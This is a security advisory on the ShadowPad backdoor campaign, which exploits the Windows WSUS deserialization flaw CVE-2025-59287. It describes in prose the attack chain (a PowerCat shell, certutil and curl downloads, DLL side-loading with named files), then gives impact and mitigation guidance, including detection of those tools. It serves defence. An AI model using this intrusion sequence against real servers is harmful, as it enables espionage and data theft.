The ShadowPad malware campaign exploits a recently patched critical vulnerability in Microsoft Windows Server Update Services (WSUS), identified as CVE-2025-59287, which is a deserialization flaw allowing remote code execution with system-level privileges. WSUS is a Windows Server role used to manage and distribute updates within enterprise environments. The vulnerability enables attackers to send crafted requests to WSUS servers, triggering deserialization of malicious data and executing arbitrary code. In documented attacks, threat actors first exploit this flaw to gain initial access to WSUS-enabled Windows Servers. They then leverage PowerCat, an open-source PowerShell-based Netcat utility, to establish a command shell on the compromised system. Subsequently, they use legitimate Windows tools such as certutil and curl to download and install ShadowPad malware. ShadowPad is a sophisticated modular backdoor, a successor to PlugX, known for its use by Chinese state-sponsored groups in espionage operations. It employs DLL side-loading by abusing a legitimate binary (ETDCtrlHelper.exe) to load a malicious DLL (ETDApix.dll) into memory, which acts as a loader for the backdoor and its plugins. The malware includes anti-detection and persistence mechanisms, allowing attackers to maintain long-term access and execute various payloads. The exploitation of CVE-2025-59287 has surged following public release of proof-of-concept exploit code, with attackers weaponizing it to compromise publicly exposed WSUS servers. Besides ShadowPad, attackers have also used the vulnerability to deploy legitimate tools like Velociraptor for reconnaissance. The criticality of this vulnerability lies in its ability to grant system-level remote code execution without authentication, making it a high-risk vector for enterprise compromise.

For European organizations, the exploitation of CVE-2025-59287 poses a significant threat to the confidentiality, integrity, and availability of critical IT infrastructure. WSUS servers are often central to patch management and software update distribution; compromise can lead to widespread malware deployment and lateral movement within networks. ShadowPad’s modular architecture and persistence capabilities enable attackers to conduct espionage, data exfiltration, and potentially disrupt operations. Organizations relying on WSUS for update management may face prolonged undetected intrusions, risking intellectual property theft and operational disruption. The use of legitimate Windows utilities in the attack chain complicates detection and response efforts. Additionally, the exposure of WSUS servers to the internet increases the attack surface, making public-facing update servers prime targets. The impact extends to regulatory compliance risks under GDPR if personal data is compromised. The threat also undermines trust in update infrastructure, potentially delaying critical patch deployments and increasing vulnerability to other threats.

European organizations should immediately apply the official Microsoft patch addressing CVE-2025-59287 to all WSUS servers. Network segmentation should be enforced to isolate WSUS servers from direct internet exposure; WSUS should not be publicly accessible unless absolutely necessary. Implement strict firewall rules and access controls limiting WSUS communication to trusted internal systems. Monitor for anomalous use of Windows utilities such as certutil, curl, and PowerShell scripts, especially those initiating outbound connections to unknown IP addresses. Deploy endpoint detection and response (EDR) solutions capable of detecting DLL side-loading and memory-resident loaders. Conduct regular audits of WSUS configurations and logs to identify unauthorized changes or suspicious activity. Employ threat hunting focused on indicators of compromise related to ShadowPad, including unusual DLL loads and network traffic to known malicious command and control servers. Educate IT and security teams on the specific attack vectors and tactics used in this campaign. Consider implementing application whitelisting to prevent unauthorized execution of binaries like ETDCtrlHelper.exe with malicious DLLs. Finally, maintain robust backup and incident response plans to quickly recover from potential compromises.